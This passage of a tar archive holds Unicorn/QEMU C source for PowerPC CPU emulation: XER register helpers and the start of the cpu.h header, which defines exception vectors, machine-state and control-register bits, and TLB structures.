* * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "cpu-models.h" target_ulong cpu_read_xer(CPUPPCState *env) { if (is_isa300(env)) { return env->xer | (env->so << XER_SO) | (env->ov << XER_OV) | (env->ca << XER_CA) | (env->ov32 << XER_OV32) | (env->ca32 << XER_CA32); } return env->xer | (env->so << XER_SO) | (env->ov << XER_OV) | (env->ca << XER_CA); } void cpu_write_xer(CPUPPCState *env, target_ulong xer) { env->so = (xer >> XER_SO) & 1; env->ov = (xer >> XER_OV) & 1; env->ca = (xer >> XER_CA) & 1; /* write all the flags, while reading back check of isa300 */ env->ov32 = (xer >> XER_OV32) & 1; env->ca32 = (xer >> XER_CA32) & 1; env->xer = xer & ~((1ul << XER_SO) | (1ul << XER_OV) | (1ul << XER_CA) | (1ul << XER_OV32) | (1ul << XER_CA32)); } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/cpu.h�����������������������������������������������������������������0000664�0000000�0000000�00000327547�14675241067�0017205�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC emulation cpu definitions for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef PPC_CPU_H #define PPC_CPU_H #include "qemu/int128.h" #include "exec/cpu-defs.h" #include "cpu-qom.h" typedef struct TCGContext TCGContext; #define TCG_GUEST_DEFAULT_MO 0 #define TARGET_PAGE_BITS_64K 16 #define TARGET_PAGE_BITS_16M 24 #if defined(TARGET_PPC64) #define PPC_ELF_MACHINE EM_PPC64 #else #define PPC_ELF_MACHINE EM_PPC #endif #define PPC_BIT(bit) (0x8000000000000000ULL >> (bit)) #define PPC_BIT32(bit) (0x80000000 >> (bit)) #define PPC_BIT8(bit) (0x80 >> (bit)) #define PPC_BITMASK(bs, be) ((PPC_BIT(bs) - PPC_BIT(be)) | PPC_BIT(bs)) #define PPC_BITMASK32(bs, be) ((PPC_BIT32(bs) - PPC_BIT32(be)) | \ PPC_BIT32(bs)) #define PPC_BITMASK8(bs, be) ((PPC_BIT8(bs) - PPC_BIT8(be)) | PPC_BIT8(bs)) /*****************************************************************************/ /* Exception vectors definitions */ enum { POWERPC_EXCP_NONE = -1, /* The 64 first entries are used by the PowerPC embedded specification */ POWERPC_EXCP_CRITICAL = 0, /* Critical input */ POWERPC_EXCP_MCHECK = 1, /* Machine check exception */ POWERPC_EXCP_DSI = 2, /* Data storage exception */ POWERPC_EXCP_ISI = 3, /* Instruction storage exception */ POWERPC_EXCP_EXTERNAL = 4, /* External input */ POWERPC_EXCP_ALIGN = 5, /* Alignment exception */ POWERPC_EXCP_PROGRAM = 6, /* Program exception */ POWERPC_EXCP_FPU = 7, /* Floating-point unavailable exception */ POWERPC_EXCP_SYSCALL = 8, /* System call exception */ POWERPC_EXCP_APU = 9, /* Auxiliary processor unavailable */ POWERPC_EXCP_DECR = 10, /* Decrementer exception */ POWERPC_EXCP_FIT = 11, /* Fixed-interval timer interrupt */ POWERPC_EXCP_WDT = 12, /* Watchdog timer interrupt */ POWERPC_EXCP_DTLB = 13, /* Data TLB miss */ POWERPC_EXCP_ITLB = 14, /* Instruction TLB miss */ POWERPC_EXCP_DEBUG = 15, /* Debug interrupt */ /* Vectors 16 to 31 are reserved */ POWERPC_EXCP_SPEU = 32, /* SPE/embedded floating-point unavailable */ POWERPC_EXCP_EFPDI = 33, /* Embedded floating-point data interrupt */ POWERPC_EXCP_EFPRI = 34, /* Embedded floating-point round interrupt */ POWERPC_EXCP_EPERFM = 35, /* Embedded performance monitor interrupt */ POWERPC_EXCP_DOORI = 36, /* Embedded doorbell interrupt */ POWERPC_EXCP_DOORCI = 37, /* Embedded doorbell critical interrupt */ POWERPC_EXCP_GDOORI = 38, /* Embedded guest doorbell interrupt */ POWERPC_EXCP_GDOORCI = 39, /* Embedded guest doorbell critical interrupt*/ POWERPC_EXCP_HYPPRIV = 41, /* Embedded hypervisor priv instruction */ /* Vectors 42 to 63 are reserved */ /* Exceptions defined in the PowerPC server specification */ POWERPC_EXCP_RESET = 64, /* System reset exception */ POWERPC_EXCP_DSEG = 65, /* Data segment exception */ POWERPC_EXCP_ISEG = 66, /* Instruction segment exception */ POWERPC_EXCP_HDECR = 67, /* Hypervisor decrementer exception */ POWERPC_EXCP_TRACE = 68, /* Trace exception */ POWERPC_EXCP_HDSI = 69, /* Hypervisor data storage exception */ POWERPC_EXCP_HISI = 70, /* Hypervisor instruction storage exception */ POWERPC_EXCP_HDSEG = 71, /* Hypervisor data segment exception */ POWERPC_EXCP_HISEG = 72, /* Hypervisor instruction segment exception */ POWERPC_EXCP_VPU = 73, /* Vector unavailable exception */ /* 40x specific exceptions */ POWERPC_EXCP_PIT = 74, /* Programmable interval timer interrupt */ /* 601 specific exceptions */ POWERPC_EXCP_IO = 75, /* IO error exception */ POWERPC_EXCP_RUNM = 76, /* Run mode exception */ /* 602 specific exceptions */ POWERPC_EXCP_EMUL = 77, /* Emulation trap exception */ /* 602/603 specific exceptions */ POWERPC_EXCP_IFTLB = 78, /* Instruction fetch TLB miss */ POWERPC_EXCP_DLTLB = 79, /* Data load TLB miss */ POWERPC_EXCP_DSTLB = 80, /* Data store TLB miss */ /* Exceptions available on most PowerPC */ POWERPC_EXCP_FPA = 81, /* Floating-point assist exception */ POWERPC_EXCP_DABR = 82, /* Data address breakpoint */ POWERPC_EXCP_IABR = 83, /* Instruction address breakpoint */ POWERPC_EXCP_SMI = 84, /* System management interrupt */ POWERPC_EXCP_PERFM = 85, /* Embedded performance monitor interrupt */ /* 7xx/74xx specific exceptions */ POWERPC_EXCP_THERM = 86, /* Thermal interrupt */ /* 74xx specific exceptions */ POWERPC_EXCP_VPUA = 87, /* Vector assist exception */ /* 970FX specific exceptions */ POWERPC_EXCP_SOFTP = 88, /* Soft patch exception */ POWERPC_EXCP_MAINT = 89, /* Maintenance exception */ /* Freescale embedded cores specific exceptions */ POWERPC_EXCP_MEXTBR = 90, /* Maskable external breakpoint */ POWERPC_EXCP_NMEXTBR = 91, /* Non maskable external breakpoint */ POWERPC_EXCP_ITLBE = 92, /* Instruction TLB error */ POWERPC_EXCP_DTLBE = 93, /* Data TLB error */ /* VSX Unavailable (Power ISA 2.06 and later) */ POWERPC_EXCP_VSXU = 94, /* VSX Unavailable */ POWERPC_EXCP_FU = 95, /* Facility Unavailable */ /* Additional ISA 2.06 and later server exceptions */ POWERPC_EXCP_HV_EMU = 96, /* HV emulation assistance */ POWERPC_EXCP_HV_MAINT = 97, /* HMI */ POWERPC_EXCP_HV_FU = 98, /* Hypervisor Facility unavailable */ /* Server doorbell variants */ POWERPC_EXCP_SDOOR = 99, POWERPC_EXCP_SDOOR_HV = 100, /* ISA 3.00 additions */ POWERPC_EXCP_HVIRT = 101, /* EOL */ POWERPC_EXCP_NB = 102, /* QEMU exceptions: used internally during code translation */ POWERPC_EXCP_STOP = 0x200, /* stop translation */ POWERPC_EXCP_BRANCH = 0x201, /* branch instruction */ /* QEMU exceptions: special cases we want to stop translation */ POWERPC_EXCP_SYNC = 0x202, /* context synchronizing instruction */ POWERPC_EXCP_SYSCALL_USER = 0x203, /* System call in user mode only */ }; /* Exceptions error codes */ enum { /* Exception subtypes for POWERPC_EXCP_ALIGN */ POWERPC_EXCP_ALIGN_FP = 0x01, /* FP alignment exception */ POWERPC_EXCP_ALIGN_LST = 0x02, /* Unaligned mult/extern load/store */ POWERPC_EXCP_ALIGN_LE = 0x03, /* Multiple little-endian access */ POWERPC_EXCP_ALIGN_PROT = 0x04, /* Access cross protection boundary */ POWERPC_EXCP_ALIGN_BAT = 0x05, /* Access cross a BAT/seg boundary */ POWERPC_EXCP_ALIGN_CACHE = 0x06, /* Impossible dcbz access */ /* Exception subtypes for POWERPC_EXCP_PROGRAM */ /* FP exceptions */ POWERPC_EXCP_FP = 0x10, POWERPC_EXCP_FP_OX = 0x01, /* FP overflow */ POWERPC_EXCP_FP_UX = 0x02, /* FP underflow */ POWERPC_EXCP_FP_ZX = 0x03, /* FP divide by zero */ POWERPC_EXCP_FP_XX = 0x04, /* FP inexact */ POWERPC_EXCP_FP_VXSNAN = 0x05, /* FP invalid SNaN op */ POWERPC_EXCP_FP_VXISI = 0x06, /* FP invalid infinite subtraction */ POWERPC_EXCP_FP_VXIDI = 0x07, /* FP invalid infinite divide */ POWERPC_EXCP_FP_VXZDZ = 0x08, /* FP invalid zero divide */ POWERPC_EXCP_FP_VXIMZ = 0x09, /* FP invalid infinite * zero */ POWERPC_EXCP_FP_VXVC = 0x0A, /* FP invalid compare */ POWERPC_EXCP_FP_VXSOFT = 0x0B, /* FP invalid operation */ POWERPC_EXCP_FP_VXSQRT = 0x0C, /* FP invalid square root */ POWERPC_EXCP_FP_VXCVI = 0x0D, /* FP invalid integer conversion */ /* Invalid instruction */ POWERPC_EXCP_INVAL = 0x20, POWERPC_EXCP_INVAL_INVAL = 0x01, /* Invalid instruction */ POWERPC_EXCP_INVAL_LSWX = 0x02, /* Invalid lswx instruction */ POWERPC_EXCP_INVAL_SPR = 0x03, /* Invalid SPR access */ POWERPC_EXCP_INVAL_FP = 0x04, /* Unimplemented mandatory fp instr */ /* Privileged instruction */ POWERPC_EXCP_PRIV = 0x30, POWERPC_EXCP_PRIV_OPC = 0x01, /* Privileged operation exception */ POWERPC_EXCP_PRIV_REG = 0x02, /* Privileged register exception */ /* Trap */ POWERPC_EXCP_TRAP = 0x40, }; #define PPC_INPUT(env) ((env)->bus_model) /*****************************************************************************/ typedef struct opc_handler_t opc_handler_t; /*****************************************************************************/ /* Types used to describe some PowerPC registers etc. */ typedef struct DisasContext DisasContext; typedef struct ppc_spr_t ppc_spr_t; typedef union ppc_tlb_t ppc_tlb_t; typedef struct ppc_hash_pte64 ppc_hash_pte64_t; /* SPR access micro-ops generations callbacks */ struct ppc_spr_t { void (*uea_read)(DisasContext *ctx, int gpr_num, int spr_num); void (*uea_write)(DisasContext *ctx, int spr_num, int gpr_num); void (*oea_read)(DisasContext *ctx, int gpr_num, int spr_num); void (*oea_write)(DisasContext *ctx, int spr_num, int gpr_num); void (*hea_read)(DisasContext *ctx, int gpr_num, int spr_num); void (*hea_write)(DisasContext *ctx, int spr_num, int gpr_num); const char *name; target_ulong default_value; #ifdef CONFIG_KVM /* * We (ab)use the fact that all the SPRs will have ids for the * ONE_REG interface will have KVM_REG_PPC to use 0 as meaning, * don't sync this */ uint64_t one_reg_id; #endif }; /* VSX/Altivec registers (128 bits) */ typedef union _ppc_vsr_t { uint8_t u8[16]; uint16_t u16[8]; uint32_t u32[4]; uint64_t u64[2]; int8_t s8[16]; int16_t s16[8]; int32_t s32[4]; int64_t s64[2]; float32 f32[4]; float64 f64[2]; float128 f128; #ifdef CONFIG_INT128 __uint128_t u128; #endif Int128 s128; } ppc_vsr_t; typedef ppc_vsr_t ppc_avr_t; typedef ppc_vsr_t ppc_fprp_t; /* Software TLB cache */ typedef struct ppc6xx_tlb_t ppc6xx_tlb_t; struct ppc6xx_tlb_t { target_ulong pte0; target_ulong pte1; target_ulong EPN; }; typedef struct ppcemb_tlb_t ppcemb_tlb_t; struct ppcemb_tlb_t { uint64_t RPN; target_ulong EPN; target_ulong PID; target_ulong size; uint32_t prot; uint32_t attr; /* Storage attributes */ }; typedef struct ppcmas_tlb_t { uint32_t mas8; uint32_t mas1; uint64_t mas2; uint64_t mas7_3; } ppcmas_tlb_t; union ppc_tlb_t { ppc6xx_tlb_t *tlb6; ppcemb_tlb_t *tlbe; ppcmas_tlb_t *tlbm; }; /* possible TLB variants */ #define TLB_NONE 0 #define TLB_6XX 1 #define TLB_EMB 2 #define TLB_MAS 3 typedef struct PPCHash64SegmentPageSizes PPCHash64SegmentPageSizes; typedef struct ppc_slb_t ppc_slb_t; struct ppc_slb_t { uint64_t esid; uint64_t vsid; const PPCHash64SegmentPageSizes *sps; }; #define MAX_SLB_ENTRIES 64 #define SEGMENT_SHIFT_256M 28 #define SEGMENT_MASK_256M (~((1ULL << SEGMENT_SHIFT_256M) - 1)) #define SEGMENT_SHIFT_1T 40 #define SEGMENT_MASK_1T (~((1ULL << SEGMENT_SHIFT_1T) - 1)) typedef struct ppc_v3_pate_t { uint64_t dw0; uint64_t dw1; } ppc_v3_pate_t; /*****************************************************************************/ /* Machine state register bits definition */ #define MSR_SF 63 /* Sixty-four-bit mode hflags */ #define MSR_TAG 62 /* Tag-active mode (POWERx ?) */ #define MSR_ISF 61 /* Sixty-four-bit interrupt mode on 630 */ #define MSR_HV 60 /* hypervisor state hflags */ #define MSR_TS0 34 /* Transactional state, 2 bits (Book3s) */ #define MSR_TS1 33 #define MSR_TM 32 /* Transactional Memory Available (Book3s) */ #define MSR_CM 31 /* Computation mode for BookE hflags */ #define MSR_ICM 30 /* Interrupt computation mode for BookE */ #define MSR_GS 28 /* guest state for BookE */ #define MSR_UCLE 26 /* User-mode cache lock enable for BookE */ #define MSR_VR 25 /* altivec available x hflags */ #define MSR_SPE 25 /* SPE enable for BookE x hflags */ #define MSR_AP 23 /* Access privilege state on 602 hflags */ #define MSR_VSX 23 /* Vector Scalar Extension (ISA 2.06 and later) x hflags */ #define MSR_SA 22 /* Supervisor access mode on 602 hflags */ #define MSR_KEY 19 /* key bit on 603e */ #define MSR_POW 18 /* Power management */ #define MSR_TGPR 17 /* TGPR usage on 602/603 x */ #define MSR_CE 17 /* Critical interrupt enable on embedded PowerPC x */ #define MSR_ILE 16 /* Interrupt little-endian mode */ #define MSR_EE 15 /* External interrupt enable */ #define MSR_PR 14 /* Problem state hflags */ #define MSR_FP 13 /* Floating point available hflags */ #define MSR_ME 12 /* Machine check interrupt enable */ #define MSR_FE0 11 /* Floating point exception mode 0 hflags */ #define MSR_SE 10 /* Single-step trace enable x hflags */ #define MSR_DWE 10 /* Debug wait enable on 405 x */ #define MSR_UBLE 10 /* User BTB lock enable on e500 x */ #define MSR_BE 9 /* Branch trace enable x hflags */ #define MSR_DE 9 /* Debug interrupts enable on embedded PowerPC x */ #define MSR_FE1 8 /* Floating point exception mode 1 hflags */ #define MSR_AL 7 /* AL bit on POWER */ #define MSR_EP 6 /* Exception prefix on 601 */ #define MSR_IR 5 /* Instruction relocate */ #define MSR_DR 4 /* Data relocate */ #define MSR_IS 5 /* Instruction address space (BookE) */ #define MSR_DS 4 /* Data address space (BookE) */ #define MSR_PE 3 /* Protection enable on 403 */ #define MSR_PX 2 /* Protection exclusive on 403 x */ #define MSR_PMM 2 /* Performance monitor mark on POWER x */ #define MSR_RI 1 /* Recoverable interrupt 1 */ #define MSR_LE 0 /* Little-endian mode 1 hflags */ /* LPCR bits */ #define LPCR_VPM0 PPC_BIT(0) #define LPCR_VPM1 PPC_BIT(1) #define LPCR_ISL PPC_BIT(2) #define LPCR_KBV PPC_BIT(3) #define LPCR_DPFD_SHIFT (63 - 11) #define LPCR_DPFD (0x7ull << LPCR_DPFD_SHIFT) #define LPCR_VRMASD_SHIFT (63 - 16) #define LPCR_VRMASD (0x1full << LPCR_VRMASD_SHIFT) /* P9: Power-saving mode Exit Cause Enable (Upper Section) Mask */ #define LPCR_PECE_U_SHIFT (63 - 19) #define LPCR_PECE_U_MASK (0x7ull << LPCR_PECE_U_SHIFT) #define LPCR_HVEE PPC_BIT(17) /* Hypervisor Virt Exit Enable */ #define LPCR_RMLS_SHIFT (63 - 37) #define LPCR_RMLS (0xfull << LPCR_RMLS_SHIFT) #define LPCR_ILE PPC_BIT(38) #define LPCR_AIL_SHIFT (63 - 40) /* Alternate interrupt location */ #define LPCR_AIL (3ull << LPCR_AIL_SHIFT) #define LPCR_UPRT PPC_BIT(41) /* Use Process Table */ #define LPCR_EVIRT PPC_BIT(42) /* Enhanced Virtualisation */ #define LPCR_HR PPC_BIT(43) /* Host Radix */ #define LPCR_ONL PPC_BIT(45) #define LPCR_LD PPC_BIT(46) /* Large Decrementer */ #define LPCR_P7_PECE0 PPC_BIT(49) #define LPCR_P7_PECE1 PPC_BIT(50) #define LPCR_P7_PECE2 PPC_BIT(51) #define LPCR_P8_PECE0 PPC_BIT(47) #define LPCR_P8_PECE1 PPC_BIT(48) #define LPCR_P8_PECE2 PPC_BIT(49) #define LPCR_P8_PECE3 PPC_BIT(50) #define LPCR_P8_PECE4 PPC_BIT(51) /* P9: Power-saving mode Exit Cause Enable (Lower Section) Mask */ #define LPCR_PECE_L_SHIFT (63 - 51) #define LPCR_PECE_L_MASK (0x1full << LPCR_PECE_L_SHIFT) #define LPCR_PDEE PPC_BIT(47) /* Privileged Doorbell Exit EN */ #define LPCR_HDEE PPC_BIT(48) /* Hyperv Doorbell Exit Enable */ #define LPCR_EEE PPC_BIT(49) /* External Exit Enable */ #define LPCR_DEE PPC_BIT(50) /* Decrementer Exit Enable */ #define LPCR_OEE PPC_BIT(51) /* Other Exit Enable */ #define LPCR_MER PPC_BIT(52) #define LPCR_GTSE PPC_BIT(53) /* Guest Translation Shootdown */ #define LPCR_TC PPC_BIT(54) #define LPCR_HEIC PPC_BIT(59) /* HV Extern Interrupt Control */ #define LPCR_LPES0 PPC_BIT(60) #define LPCR_LPES1 PPC_BIT(61) #define LPCR_RMI PPC_BIT(62) #define LPCR_HVICE PPC_BIT(62) /* HV Virtualisation Int Enable */ #define LPCR_HDICE PPC_BIT(63) /* PSSCR bits */ #define PSSCR_ESL PPC_BIT(42) /* Enable State Loss */ #define PSSCR_EC PPC_BIT(43) /* Exit Criterion */ /* HFSCR bits */ #define HFSCR_MSGP PPC_BIT(53) /* Privileged Message Send Facilities */ #define HFSCR_IC_MSGP 0xA #define msr_sf ((env->msr >> MSR_SF) & 1) #define msr_isf ((env->msr >> MSR_ISF) & 1) #if defined(TARGET_PPC64) #define msr_hv ((env->msr >> MSR_HV) & 1) #else #define msr_hv (0) #endif #define msr_cm ((env->msr >> MSR_CM) & 1) #define msr_icm ((env->msr >> MSR_ICM) & 1) #define msr_gs ((env->msr >> MSR_GS) & 1) #define msr_ucle ((env->msr >> MSR_UCLE) & 1) #define msr_vr ((env->msr >> MSR_VR) & 1) #define msr_spe ((env->msr >> MSR_SPE) & 1) #define msr_ap ((env->msr >> MSR_AP) & 1) #define msr_vsx ((env->msr >> MSR_VSX) & 1) #define msr_sa ((env->msr >> MSR_SA) & 1) #define msr_key ((env->msr >> MSR_KEY) & 1) #define msr_pow ((env->msr >> MSR_POW) & 1) #define msr_tgpr ((env->msr >> MSR_TGPR) & 1) #define msr_ce ((env->msr >> MSR_CE) & 1) #define msr_ile ((env->msr >> MSR_ILE) & 1) #define msr_ee ((env->msr >> MSR_EE) & 1) #define msr_pr ((env->msr >> MSR_PR) & 1) #define msr_fp ((env->msr >> MSR_FP) & 1) #define msr_me ((env->msr >> MSR_ME) & 1) #define msr_fe0 ((env->msr >> MSR_FE0) & 1) #define msr_se ((env->msr >> MSR_SE) & 1) #define msr_dwe ((env->msr >> MSR_DWE) & 1) #define msr_uble ((env->msr >> MSR_UBLE) & 1) #define msr_be ((env->msr >> MSR_BE) & 1) #define msr_de ((env->msr >> MSR_DE) & 1) #define msr_fe1 ((env->msr >> MSR_FE1) & 1) #define msr_al ((env->msr >> MSR_AL) & 1) #define msr_ep ((env->msr >> MSR_EP) & 1) #define msr_ir ((env->msr >> MSR_IR) & 1) #define msr_dr ((env->msr >> MSR_DR) & 1) #define msr_is ((env->msr >> MSR_IS) & 1) #define msr_ds ((env->msr >> MSR_DS) & 1) #define msr_pe ((env->msr >> MSR_PE) & 1) #define msr_px ((env->msr >> MSR_PX) & 1) #define msr_pmm ((env->msr >> MSR_PMM) & 1) #define msr_ri ((env->msr >> MSR_RI) & 1) #define msr_le ((env->msr >> MSR_LE) & 1) #define msr_ts ((env->msr >> MSR_TS1) & 3) #define msr_tm ((env->msr >> MSR_TM) & 1) #define DBCR0_ICMP (1 << 27) #define DBCR0_BRT (1 << 26) #define DBSR_ICMP (1 << 27) #define DBSR_BRT (1 << 26) /* Hypervisor bit is more specific */ #if defined(TARGET_PPC64) #define MSR_HVB (1ULL << MSR_HV) #else #define MSR_HVB (0ULL) #endif /* DSISR */ #define DSISR_NOPTE 0x40000000 /* Not permitted by access authority of encoded access authority */ #define DSISR_PROTFAULT 0x08000000 #define DSISR_ISSTORE 0x02000000 /* Not permitted by virtual page class key protection */ #define DSISR_AMR 0x00200000 /* Unsupported Radix Tree Configuration */ #define DSISR_R_BADCONFIG 0x00080000 /* SRR1 error code fields */ #define SRR1_NOPTE DSISR_NOPTE /* Not permitted due to no-execute or guard bit set */ #define SRR1_NOEXEC_GUARD 0x10000000 #define SRR1_PROTFAULT DSISR_PROTFAULT #define SRR1_IAMR DSISR_AMR /* Facility Status and Control (FSCR) bits */ #define FSCR_EBB (63 - 56) /* Event-Based Branch Facility */ #define FSCR_TAR (63 - 55) /* Target Address Register */ /* Interrupt cause mask and position in FSCR. HFSCR has the same format */ #define FSCR_IC_MASK (0xFFULL) #define FSCR_IC_POS (63 - 7) #define FSCR_IC_DSCR_SPR3 2 #define FSCR_IC_PMU 3 #define FSCR_IC_BHRB 4 #define FSCR_IC_TM 5 #define FSCR_IC_EBB 7 #define FSCR_IC_TAR 8 /* Exception state register bits definition */ #define ESR_PIL PPC_BIT(36) /* Illegal Instruction */ #define ESR_PPR PPC_BIT(37) /* Privileged Instruction */ #define ESR_PTR PPC_BIT(38) /* Trap */ #define ESR_FP PPC_BIT(39) /* Floating-Point Operation */ #define ESR_ST PPC_BIT(40) /* Store Operation */ #define ESR_AP PPC_BIT(44) /* Auxiliary Processor Operation */ #define ESR_PUO PPC_BIT(45) /* Unimplemented Operation */ #define ESR_BO PPC_BIT(46) /* Byte Ordering */ #define ESR_PIE PPC_BIT(47) /* Imprecise exception */ #define ESR_DATA PPC_BIT(53) /* Data Access (Embedded page table) */ #define ESR_TLBI PPC_BIT(54) /* TLB Ineligible (Embedded page table) */ #define ESR_PT PPC_BIT(55) /* Page Table (Embedded page table) */ #define ESR_SPV PPC_BIT(56) /* SPE/VMX operation */ #define ESR_EPID PPC_BIT(57) /* External Process ID operation */ #define ESR_VLEMI PPC_BIT(58) /* VLE operation */ #define ESR_MIF PPC_BIT(62) /* Misaligned instruction (VLE) */ /* Transaction EXception And Summary Register bits */ #define TEXASR_FAILURE_PERSISTENT (63 - 7) #define TEXASR_DISALLOWED (63 - 8) #define TEXASR_NESTING_OVERFLOW (63 - 9) #define TEXASR_FOOTPRINT_OVERFLOW (63 - 10) #define TEXASR_SELF_INDUCED_CONFLICT (63 - 11) #define TEXASR_NON_TRANSACTIONAL_CONFLICT (63 - 12) #define TEXASR_TRANSACTION_CONFLICT (63 - 13) #define TEXASR_TRANSLATION_INVALIDATION_CONFLICT (63 - 14) #define TEXASR_IMPLEMENTATION_SPECIFIC (63 - 15) #define TEXASR_INSTRUCTION_FETCH_CONFLICT (63 - 16) #define TEXASR_ABORT (63 - 31) #define TEXASR_SUSPENDED (63 - 32) #define TEXASR_PRIVILEGE_HV (63 - 34) #define TEXASR_PRIVILEGE_PR (63 - 35) #define TEXASR_FAILURE_SUMMARY (63 - 36) #define TEXASR_TFIAR_EXACT (63 - 37) #define TEXASR_ROT (63 - 38) #define TEXASR_TRANSACTION_LEVEL (63 - 52) /* 12 bits */ enum { POWERPC_FLAG_NONE = 0x00000000, /* Flag for MSR bit 25 signification (VRE/SPE) */ POWERPC_FLAG_SPE = 0x00000001, POWERPC_FLAG_VRE = 0x00000002, /* Flag for MSR bit 17 signification (TGPR/CE) */ POWERPC_FLAG_TGPR = 0x00000004, POWERPC_FLAG_CE = 0x00000008, /* Flag for MSR bit 10 signification (SE/DWE/UBLE) */ POWERPC_FLAG_SE = 0x00000010, POWERPC_FLAG_DWE = 0x00000020, POWERPC_FLAG_UBLE = 0x00000040, /* Flag for MSR bit 9 signification (BE/DE) */ POWERPC_FLAG_BE = 0x00000080, POWERPC_FLAG_DE = 0x00000100, /* Flag for MSR bit 2 signification (PX/PMM) */ POWERPC_FLAG_PX = 0x00000200, POWERPC_FLAG_PMM = 0x00000400, /* Flag for special features */ /* Decrementer clock: RTC clock (POWER, 601) or bus clock */ POWERPC_FLAG_RTC_CLK = 0x00010000, POWERPC_FLAG_BUS_CLK = 0x00020000, /* Has CFAR */ POWERPC_FLAG_CFAR = 0x00040000, /* Has VSX */ POWERPC_FLAG_VSX = 0x00080000, /* Has Transaction Memory (ISA 2.07) */ POWERPC_FLAG_TM = 0x00100000, }; /*****************************************************************************/ /* Floating point status and control register */ #define FPSCR_DRN2 34 /* Decimal Floating-Point rounding control */ #define FPSCR_DRN1 33 /* Decimal Floating-Point rounding control */ #define FPSCR_DRN0 32 /* Decimal Floating-Point rounding control */ #define FPSCR_FX 31 /* Floating-point exception summary */ #define FPSCR_FEX 30 /* Floating-point enabled exception summary */ #define FPSCR_VX 29 /* Floating-point invalid operation exception summ. */ #define FPSCR_OX 28 /* Floating-point overflow exception */ #define FPSCR_UX 27 /* Floating-point underflow exception */ #define FPSCR_ZX 26 /* Floating-point zero divide exception */ #define FPSCR_XX 25 /* Floating-point inexact exception */ #define FPSCR_VXSNAN 24 /* Floating-point invalid operation exception (sNan) */ #define FPSCR_VXISI 23 /* Floating-point invalid operation exception (inf) */ #define FPSCR_VXIDI 22 /* Floating-point invalid operation exception (inf) */ #define FPSCR_VXZDZ 21 /* Floating-point invalid operation exception (zero) */ #define FPSCR_VXIMZ 20 /* Floating-point invalid operation exception (inf) */ #define FPSCR_VXVC 19 /* Floating-point invalid operation exception (comp) */ #define FPSCR_FR 18 /* Floating-point fraction rounded */ #define FPSCR_FI 17 /* Floating-point fraction inexact */ #define FPSCR_C 16 /* Floating-point result class descriptor */ #define FPSCR_FL 15 /* Floating-point less than or negative */ #define FPSCR_FG 14 /* Floating-point greater than or negative */ #define FPSCR_FE 13 /* Floating-point equal or zero */ #define FPSCR_FU 12 /* Floating-point unordered or NaN */ #define FPSCR_FPCC 12 /* Floating-point condition code */ #define FPSCR_FPRF 12 /* Floating-point result flags */ #define FPSCR_VXSOFT 10 /* Floating-point invalid operation exception (soft) */ #define FPSCR_VXSQRT 9 /* Floating-point invalid operation exception (sqrt) */ #define FPSCR_VXCVI 8 /* Floating-point invalid operation exception (int) */ #define FPSCR_VE 7 /* Floating-point invalid operation exception enable */ #define FPSCR_OE 6 /* Floating-point overflow exception enable */ #define FPSCR_UE 5 /* Floating-point undeflow exception enable */ #define FPSCR_ZE 4 /* Floating-point zero divide exception enable */ #define FPSCR_XE 3 /* Floating-point inexact exception enable */ #define FPSCR_NI 2 /* Floating-point non-IEEE mode */ #define FPSCR_RN1 1 #define FPSCR_RN0 0 /* Floating-point rounding control */ #define fpscr_drn (((env->fpscr) & FP_DRN) >> FPSCR_DRN0) #define fpscr_fex (((env->fpscr) >> FPSCR_FEX) & 0x1) #define fpscr_vx (((env->fpscr) >> FPSCR_VX) & 0x1) #define fpscr_ox (((env->fpscr) >> FPSCR_OX) & 0x1) #define fpscr_ux (((env->fpscr) >> FPSCR_UX) & 0x1) #define fpscr_zx (((env->fpscr) >> FPSCR_ZX) & 0x1) #define fpscr_xx (((env->fpscr) >> FPSCR_XX) & 0x1) #define fpscr_vxsnan (((env->fpscr) >> FPSCR_VXSNAN) & 0x1) #define fpscr_vxisi (((env->fpscr) >> FPSCR_VXISI) & 0x1) #define fpscr_vxidi (((env->fpscr) >> FPSCR_VXIDI) & 0x1) #define fpscr_vxzdz (((env->fpscr) >> FPSCR_VXZDZ) & 0x1) #define fpscr_vximz (((env->fpscr) >> FPSCR_VXIMZ) & 0x1) #define fpscr_vxvc (((env->fpscr) >> FPSCR_VXVC) & 0x1) #define fpscr_fpcc (((env->fpscr) >> FPSCR_FPCC) & 0xF) #define fpscr_vxsoft (((env->fpscr) >> FPSCR_VXSOFT) & 0x1) #define fpscr_vxsqrt (((env->fpscr) >> FPSCR_VXSQRT) & 0x1) #define fpscr_vxcvi (((env->fpscr) >> FPSCR_VXCVI) & 0x1) #define fpscr_ve (((env->fpscr) >> FPSCR_VE) & 0x1) #define fpscr_oe (((env->fpscr) >> FPSCR_OE) & 0x1) #define fpscr_ue (((env->fpscr) >> FPSCR_UE) & 0x1) #define fpscr_ze (((env->fpscr) >> FPSCR_ZE) & 0x1) #define fpscr_xe (((env->fpscr) >> FPSCR_XE) & 0x1) #define fpscr_ni (((env->fpscr) >> FPSCR_NI) & 0x1) #define fpscr_rn (((env->fpscr) >> FPSCR_RN0) & 0x3) /* Invalid operation exception summary */ #define fpscr_ix ((env->fpscr) & ((1 << FPSCR_VXSNAN) | (1 << FPSCR_VXISI) | \ (1 << FPSCR_VXIDI) | (1 << FPSCR_VXZDZ) | \ (1 << FPSCR_VXIMZ) | (1 << FPSCR_VXVC) | \ (1 << FPSCR_VXSOFT) | (1 << FPSCR_VXSQRT) | \ (1 << FPSCR_VXCVI))) /* exception summary */ #define fpscr_ex (((env->fpscr) >> FPSCR_XX) & 0x1F) /* enabled exception summary */ #define fpscr_eex (((env->fpscr) >> FPSCR_XX) & ((env->fpscr) >> FPSCR_XE) & \ 0x1F) #define FP_DRN2 (1ull << FPSCR_DRN2) 